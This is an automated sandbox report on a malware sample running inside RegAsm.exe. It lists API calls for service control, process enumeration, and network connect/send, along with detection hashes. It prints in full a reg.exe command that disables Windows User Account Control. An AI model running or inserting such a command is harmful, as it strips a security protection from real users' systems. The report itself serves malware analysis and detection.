                                                                • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACB1
                                                                • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACC5
                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACD2
                                                                • ControlService.ADVAPI32(00000000,00000003,?,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACE1
                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACF3
                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACF6
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Service$CloseHandle$Open$ControlManager
                                                                • String ID:
                                                                • API String ID: 221034970-0
                                                                • Opcode ID: d2f399c3bcd0f1044f14c411125fc5822346b4401d7891a80fcd35a5d0c32c00
                                                                • Instruction ID: 4c72e2560426042a93d841201029be6eaa37955ba2c7d49e75f16ae618c5df44
                                                                • Opcode Fuzzy Hash: d2f399c3bcd0f1044f14c411125fc5822346b4401d7891a80fcd35a5d0c32c00
                                                                • Instruction Fuzzy Hash: 85F0F631501228BBD7116F25AC49DFF3B6CDB45B62F00002AFE0992192EB38CD46A6F9
                                                                APIs
                                                                • RegisterClassExA.USER32(00000030), ref: 0041D5EC
                                                                • CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041D607
                                                                • GetLastError.KERNEL32 ref: 0041D611
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ClassCreateErrorLastRegisterWindow
                                                                • String ID: 0$MsgWindowClass
                                                                • API String ID: 2877667751-2410386613
                                                                • Opcode ID: 722de5e8388a8877474a119f468a3301e062738380f3873f65828015e8b741e1
                                                                • Instruction ID: e808ecd18ef19f47bd472c0c6462b34ef8490c58390ad3ae495a6aa035ed2a4b
                                                                • Opcode Fuzzy Hash: 722de5e8388a8877474a119f468a3301e062738380f3873f65828015e8b741e1
                                                                • Instruction Fuzzy Hash: 1F0125B1D00219ABDB00DFA5EC849EFBBBCEA08355F40453AF914A6241EB7589058AA4
                                                                APIs
                                                                • CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 004077D6
                                                                • CloseHandle.KERNEL32(?), ref: 004077E5
                                                                • CloseHandle.KERNEL32(?), ref: 004077EA
                                                                Strings
                                                                • /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, xrefs: 004077CC
                                                                • C:\Windows\System32\cmd.exe, xrefs: 004077D1
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CloseHandle$CreateProcess
                                                                • String ID: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f$C:\Windows\System32\cmd.exe
                                                                • API String ID: 2922976086-4183131282
                                                                • Opcode ID: c38a1c4fbaf06b70ee3143182280ce63ac5342037887d892980c2b2f1eb259a7
                                                                • Instruction ID: 1887ccd63cb29ce90d3c4a9dee080bc6fb52b3336ad705aa4023eed0db3a7680
                                                                • Opcode Fuzzy Hash: c38a1c4fbaf06b70ee3143182280ce63ac5342037887d892980c2b2f1eb259a7
                                                                • Instruction Fuzzy Hash: 04F09672D4029C76CB20ABD7AC0EEDF7F3CEBC5B11F00051AF904A2045DA745400CAB5
                                                                Strings
                                                                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, xrefs: 004076FF
                                                                • SG, xrefs: 00407715
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID: SG$C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                • API String ID: 0-643455097
                                                                • Opcode ID: 9875d9faf70918787a925bf8ffd0fe05ff0f1e0d4d07a7049234b56cd1ae4be9
                                                                • Instruction ID: 5ffff352cfcc2e87221e4fa572a01d73507d198e899e6baa5594ec663d9dd15d
                                                                • Opcode Fuzzy Hash: 9875d9faf70918787a925bf8ffd0fe05ff0f1e0d4d07a7049234b56cd1ae4be9
                                                                • Instruction Fuzzy Hash: 8DF02BB0E04600EBCB1477345D296AA3656A780397F40487BF507EB2F2EBBD5C41871E
                                                                APIs
                                                                • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,0044338B,?,?,0044332B,?), ref: 004433FA
                                                                • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0044340D
                                                                • FreeLibrary.KERNEL32(00000000,?,?,?,0044338B,?,?,0044332B,?), ref: 00443430
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: AddressFreeHandleLibraryModuleProc
                                                                • String ID: CorExitProcess$mscoree.dll
                                                                • API String ID: 4061214504-1276376045
                                                                • Opcode ID: ffd65e2a986ef432bd98aae630379cdfc9b477bc787d361fad657d5437817096
                                                                • Instruction ID: d7bd46dfab834bb5d48edea7818df211002af85bf4a2e706b61bd78119be3437
                                                                • Opcode Fuzzy Hash: ffd65e2a986ef432bd98aae630379cdfc9b477bc787d361fad657d5437817096
                                                                • Instruction Fuzzy Hash: 4EF04931900208FBDB159F65DC45B9EBF74EF04753F0040A5F805A2251DB758E40CA99
                                                                APIs
                                                                • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00405120
                                                                • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00404E7A,00000001), ref: 0040512C
                                                                • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,00404E7A,00000001), ref: 00405137
                                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00404E7A,00000001), ref: 00405140
                                                                  • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Event$CloseCreateHandleLocalObjectSingleTimeWait
                                                                • String ID: KeepAlive | Disabled
                                                                • API String ID: 2993684571-305739064
                                                                • Opcode ID: 1fd388f523b344ad3ce7bacd9f737274470046df98bc8577e1acfe76f453cfe4
                                                                • Instruction ID: dc79248355977efa3495ea8e96f68553e1f2867eb32bbe7dc6984d352a193ca4
                                                                • Opcode Fuzzy Hash: 1fd388f523b344ad3ce7bacd9f737274470046df98bc8577e1acfe76f453cfe4
                                                                • Instruction Fuzzy Hash: 5DF06D71904711BBDB203B758D0AAAB7E95AB06315F0009BEF982916E2D6798C408F9A
                                                                APIs
                                                                • GetStdHandle.KERNEL32(000000F5,00000000,?,?,?,?,?,?,0041CE7E), ref: 0041CDF3
                                                                • GetConsoleScreenBufferInfo.KERNEL32(00000000,?,?,?,?,?,?,?,0041CE7E), ref: 0041CE00
                                                                • SetConsoleTextAttribute.KERNEL32(00000000,0000000C,?,?,?,?,?,?,0041CE7E), ref: 0041CE0D
                                                                • SetConsoleTextAttribute.KERNEL32(00000000,?,?,?,?,?,?,?,0041CE7E), ref: 0041CE20
                                                                Strings
                                                                • ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/ , xrefs: 0041CE13
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Console$AttributeText$BufferHandleInfoScreen
                                                                • String ID: ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/
                                                                • API String ID: 3024135584-2418719853
                                                                • Opcode ID: e39debb9b2b39d29e793f9bd33498d8add4ef2108ba1fa2e7e75c33182c8a1d6
                                                                • Instruction ID: 3099d3b49c49d1df3d44327ff87017ee7d1b0803ff7cdb2815dc6b7c28d9377e
                                                                • Opcode Fuzzy Hash: e39debb9b2b39d29e793f9bd33498d8add4ef2108ba1fa2e7e75c33182c8a1d6
                                                                • Instruction Fuzzy Hash: B6E04872504315E7E31027B5EC4DCAB7B7CE745613B100266FA16915D39A749C41C6B5
                                                                APIs
                                                                • GetModuleHandleA.KERNEL32(User32.dll,GetCursorInfo), ref: 00401414
                                                                • GetProcAddress.KERNEL32(00000000), ref: 0040141B
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: AddressHandleModuleProc
                                                                • String ID: GetCursorInfo$User32.dll$`Mw
                                                                • API String ID: 1646373207-2986171508
                                                                • Opcode ID: d896883a00b7c9d91a41f0e937368129b1e8cf7bb1ae53218dcc7360cef0261f
                                                                • Instruction ID: 8b26e8b19aea132afe7ec2793fcae50f4a2deac5c44528798ee909e27cd98dc2
                                                                • Opcode Fuzzy Hash: d896883a00b7c9d91a41f0e937368129b1e8cf7bb1ae53218dcc7360cef0261f
                                                                • Instruction Fuzzy Hash: 6BB092B4981740FB8F102BB0AE4EA193A25B614703B1008B6F046961A2EBB888009A2E
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 52d86c3ce57e0cfe0599c5a04198a87027602046587802b200418d3fba34e127
                                                                • Instruction ID: 15e211ccade7fc2a5debfa8ad78d9bfa955d5b29a73147504924d067d3782226
                                                                • Opcode Fuzzy Hash: 52d86c3ce57e0cfe0599c5a04198a87027602046587802b200418d3fba34e127
                                                                • Instruction Fuzzy Hash: 2771D4319012569BEB21CF55C884AFFBB75EF55310F19412BE815672A0DB78CCC1CBA8
                                                                APIs
                                                                • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045F244), ref: 0044944F
                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00472764,000000FF,00000000,0000003F,00000000,?,?), ref: 004494C7
                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,004727B8,000000FF,?,0000003F,00000000,?), ref: 004494F4
                                                                • _free.LIBCMT ref: 0044943D
                                                                  • Part of subcall function 00446802: HeapFree.KERNEL32(00000000,00000000,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?), ref: 00446818
                                                                  • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                                                • _free.LIBCMT ref: 00449609
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
                                                                • String ID:
                                                                • API String ID: 1286116820-0
                                                                • Opcode ID: 5cd2e88b37ead4a53a3ad7e2b8222e2e62bf3e8d34a7aba608fbabac987024fa
                                                                • Instruction ID: 45cf5ea20785abb2a7eec221213eb08c1b8584214e6df16efc40294c4842d026
                                                                • Opcode Fuzzy Hash: 5cd2e88b37ead4a53a3ad7e2b8222e2e62bf3e8d34a7aba608fbabac987024fa
                                                                • Instruction Fuzzy Hash: 1B51EC71900205ABEB14EF69DD819AFB7B8EF44724F20066FE418D3291EB789D41DB58
                                                                APIs
                                                                  • Part of subcall function 0041C048: GetCurrentProcess.KERNEL32(?,?,?,0040DAE5,WinDir,00000000,00000000), ref: 0041C059
                                                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040F956
                                                                • Process32FirstW.KERNEL32(00000000,?), ref: 0040F97A
                                                                • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040F989
                                                                • CloseHandle.KERNEL32(00000000), ref: 0040FB40
                                                                  • Part of subcall function 0041C076: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,0040F634,00000000,?,?,00475338), ref: 0041C08B
                                                                  • Part of subcall function 0041C26E: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C286
                                                                  • Part of subcall function 0041C26E: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C299
                                                                • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040FB31
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Process$OpenProcess32$Next$CloseCreateCurrentFirstHandleSnapshotToolhelp32
                                                                • String ID:
                                                                • API String ID: 4269425633-0
                                                                • Opcode ID: 5013d04b6558d5b24e4612dd319dda4bb727b03e7287b844ebb1e8f149362748
                                                                • Instruction ID: d02cab962e177bd28921c4f9a71df23b762ba7d31cecf8da060328e0f3db66c6
                                                                • Opcode Fuzzy Hash: 5013d04b6558d5b24e4612dd319dda4bb727b03e7287b844ebb1e8f149362748
                                                                • Instruction Fuzzy Hash: 5F4136311083419BC325F722DC51AEFB3A5AF94305F50493EF58A921E2EF385A49C65A
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: _free
                                                                • String ID:
                                                                • API String ID: 269201875-0
                                                                • Opcode ID: 1c82e8231a1e7df7fc61a9fb39ee41d92c56425fa3e393906510b0ca3dcf776a
                                                                • Instruction ID: bbec49e9ccdd5c2af131aecc9b6810ea24321c3eb42f74c08fbdd36582e243a3
                                                                • Opcode Fuzzy Hash: 1c82e8231a1e7df7fc61a9fb39ee41d92c56425fa3e393906510b0ca3dcf776a
                                                                • Instruction Fuzzy Hash: 5F41E232E00200AFEB14DF78C881A5EB3B5EF89B18F1545AEE915EB351D735AE05CB84
                                                                APIs
                                                                • MultiByteToWideChar.KERNEL32(?,00000000,?,00000000,00000000,00000000,0042DD92,?,?,?,00000001,00000000,?,00000001,0042DD92,0042DD92), ref: 004511F9
                                                                • __alloca_probe_16.LIBCMT ref: 00451231
                                                                • MultiByteToWideChar.KERNEL32(?,00000001,?,00000000,00000000,0042DD92,?,?,?,00000001,00000000,?,00000001,0042DD92,0042DD92,?), ref: 00451282
                                                                • GetStringTypeW.KERNEL32(00000001,00000000,00000000,00000001,?,?,?,00000001,00000000,?,00000001,0042DD92,0042DD92,?,00000002,00000000), ref: 00451294
                                                                • __freea.LIBCMT ref: 0045129D
                                                                  • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                                                                • String ID:
                                                                • API String ID: 313313983-0
                                                                • Opcode ID: bc12763b399a6208d318c17ed7bb5e89049be1fb7aa338cc20da594798c3f730
                                                                • Instruction ID: f723c28c07ecd650b398e20bb728631ced1c531215915adb10fa1f31571a6cea
                                                                • Opcode Fuzzy Hash: bc12763b399a6208d318c17ed7bb5e89049be1fb7aa338cc20da594798c3f730
                                                                • Instruction Fuzzy Hash: F7310331A0020AABDF249F65DC41EAF7BA5EB04701F0445AAFC08E72A2E739CC55CB94
                                                                APIs
                                                                • GetEnvironmentStringsW.KERNEL32 ref: 0044F3E3
                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0044F406
                                                                  • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044F42C
                                                                • _free.LIBCMT ref: 0044F43F
                                                                • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0044F44E
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                • String ID:
                                                                • API String ID: 336800556-0
                                                                • Opcode ID: 5500135b4103b87c343acc58efff57d349ffb1ffd5e47bf571a7f4768ca97117
                                                                • Instruction ID: b6d7bf627ac8e1e23e8e90154f8049d5dc13ee9613ce4caf203d647ba434722a
                                                                • Opcode Fuzzy Hash: 5500135b4103b87c343acc58efff57d349ffb1ffd5e47bf571a7f4768ca97117
                                                                • Instruction Fuzzy Hash: 2401DF72602721BF37211ABB5C8DC7F6AACDEC6FA5355013AFD04D2202DE688D0691B9
                                                                APIs
                                                                • GetLastError.KERNEL32(?,00000000,00000000,0043BCD6,00000000,00000000,?,0043BD5A,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044831E
                                                                • _free.LIBCMT ref: 00448353
                                                                • _free.LIBCMT ref: 0044837A
                                                                • SetLastError.KERNEL32(00000000,?,00405103), ref: 00448387
                                                                • SetLastError.KERNEL32(00000000,?,00405103), ref: 00448390
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ErrorLast$_free
                                                                • String ID:
                                                                • API String ID: 3170660625-0
                                                                • Opcode ID: 1cfc413842d63f34c7f1edcf4c7ea3bb1e2262b941f6d70642a76626a3a2f89f
                                                                • Instruction ID: 5af5a014564f127a9d6b3613d5887cb4baea3ca98ff5bc54bcf39f1731b7af1a
                                                                • Opcode Fuzzy Hash: 1cfc413842d63f34c7f1edcf4c7ea3bb1e2262b941f6d70642a76626a3a2f89f
                                                                • Instruction Fuzzy Hash: 3401F936100B006BB7117A2A5C45E6F3259DBD2B75B35093FFD1892292EF7ECC02812D
                                                                APIs
                                                                • _free.LIBCMT ref: 00450A54
                                                                  • Part of subcall function 00446802: HeapFree.KERNEL32(00000000,00000000,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?), ref: 00446818
                                                                  • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                                                • _free.LIBCMT ref: 00450A66
                                                                • _free.LIBCMT ref: 00450A78
                                                                • _free.LIBCMT ref: 00450A8A
                                                                • _free.LIBCMT ref: 00450A9C
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: _free$ErrorFreeHeapLast
                                                                • String ID:
                                                                • API String ID: 776569668-0
                                                                • Opcode ID: 3215379f381551316c6ac489d477ac1f9e59373460363398d28d4bb450e902e5
                                                                • Instruction ID: 72fff71e7c38304dd33e0b5962bcef44c8ad6e5fbb3f6de42623dcf71f8de19c
                                                                • Opcode Fuzzy Hash: 3215379f381551316c6ac489d477ac1f9e59373460363398d28d4bb450e902e5
                                                                • Instruction Fuzzy Hash: F7F012765053006B9620EB5DE883C1773D9EA157117A68C1BF549DB652C778FCC0866C
                                                                APIs
                                                                • _free.LIBCMT ref: 00444106
                                                                  • Part of subcall function 00446802: HeapFree.KERNEL32(00000000,00000000,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?), ref: 00446818
                                                                  • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                                                • _free.LIBCMT ref: 00444118
                                                                • _free.LIBCMT ref: 0044412B
                                                                • _free.LIBCMT ref: 0044413C
                                                                • _free.LIBCMT ref: 0044414D
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: _free$ErrorFreeHeapLast
                                                                • String ID:
                                                                • API String ID: 776569668-0
                                                                • Opcode ID: d22801927142449f45bafb541f3c6c05cfc56c6a25697691e9266b530bc09d46
                                                                • Instruction ID: 0e9c2896d1a2baf17e4b980eca3efa8a556ca0a6e45d827b59e8921ed08f8926
                                                                • Opcode Fuzzy Hash: d22801927142449f45bafb541f3c6c05cfc56c6a25697691e9266b530bc09d46
                                                                • Instruction Fuzzy Hash: 91F03AB18025208FA731AF2DBD528053BA1A705720356853BF40C62A71C7B849C2DFDF
                                                                APIs
                                                                • _strpbrk.LIBCMT ref: 0044E7B8
                                                                • _free.LIBCMT ref: 0044E8D5
                                                                  • Part of subcall function 0043BD68: IsProcessorFeaturePresent.KERNEL32(00000017,0043BD3A,00405103,?,00000000,00000000,004020A6,00000000,00000000,?,0043BD5A,00000000,00000000,00000000,00000000,00000000), ref: 0043BD6A
                                                                  • Part of subcall function 0043BD68: GetCurrentProcess.KERNEL32(C0000417,?,00405103), ref: 0043BD8C
                                                                  • Part of subcall function 0043BD68: TerminateProcess.KERNEL32(00000000,?,00405103), ref: 0043BD93
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Process$CurrentFeaturePresentProcessorTerminate_free_strpbrk
                                                                • String ID: *?$.
                                                                • API String ID: 2812119850-3972193922
                                                                • Opcode ID: 425935087bf6a06ef5f668eca0c2840133b7cce1b1476d2e54c501535b2ee598
                                                                • Instruction ID: bbc13fc8ee10fdca904a4e9292213e09ebfa005f106ef5a16faeda3ce4fd08f7
                                                                • Opcode Fuzzy Hash: 425935087bf6a06ef5f668eca0c2840133b7cce1b1476d2e54c501535b2ee598
                                                                • Instruction Fuzzy Hash: C251B175E00209AFEF14DFAAC881AAEF7B5FF58314F24416EE844E7341E6399A018B54
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CountEventTick
                                                                • String ID: !D@$NG
                                                                • API String ID: 180926312-2721294649
                                                                • Opcode ID: 8a75b7b28f678e250e8660480d12a5fc3fd1b4be0bc449009060b37327f5e913
                                                                • Instruction ID: 3ac9408315e1e6036cedb879f74fb80cbd33a95067926c5a5f9e9f7d680cff10
                                                                • Opcode Fuzzy Hash: 8a75b7b28f678e250e8660480d12a5fc3fd1b4be0bc449009060b37327f5e913
                                                                • Instruction Fuzzy Hash: 3E51A5315082019AC724FB32D852AFF73A5AF94304F50483FF54A671E2EF3C5945C68A
                                                                APIs
                                                                • GetKeyboardLayoutNameA.USER32(?), ref: 00409F0E
                                                                  • Part of subcall function 004048C8: connect.WS2_32(?,?,?), ref: 004048E0
                                                                  • Part of subcall function 0041C5A6: CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,?,00000000,00409F96,00474EE0,?,00474EE0,00000000,00474EE0,00000000), ref: 0041C5BB
                                                                  • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CreateFileKeyboardLayoutNameconnectsend
                                                                • String ID: XQG$NG$PG
                                                                • API String ID: 1634807452-3565412412
                                                                • Opcode ID: e3cbe9e01f77a77e9f2618075dd2463eb662c8aee28ccbe5d1f3042206ea7278
                                                                • Instruction ID: 86122f73fea86c9dce3a8c8dcd7d10d1556e7c038dfd98f63e082762e027ad1b
                                                                • Opcode Fuzzy Hash: e3cbe9e01f77a77e9f2618075dd2463eb662c8aee28ccbe5d1f3042206ea7278
                                                                • Instruction Fuzzy Hash: 955120315082419BC328FB32D851AEFB3E5AFD4348F50493FF54AA71E2EF78594A8649
                                                                APIs
                                                                • GetModuleFileNameA.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000104), ref: 00443515
                                                                • _free.LIBCMT ref: 004435E0
                                                                • _free.LIBCMT ref: 004435EA
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: _free$FileModuleName
                                                                • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                • API String ID: 2506810119-1068371695
                                                                • Opcode ID: 85df99244543f45e80e68b9da345e50485f416d8f0a3fa02bb076d818d98866e
                                                                • Instruction ID: e5efe6401a3e5f1db0e1141fbbc5a3d1caea7301f6195c2e8eaff0a3f5655f7e
                                                                • Opcode Fuzzy Hash: 85df99244543f45e80e68b9da345e50485f416d8f0a3fa02bb076d818d98866e
                                                                • Instruction Fuzzy Hash: D63193B1A00254BFEB21DF9A998199EBBF8EB84B15F10406BF40597311D6B88F41CB99
                                                                APIs
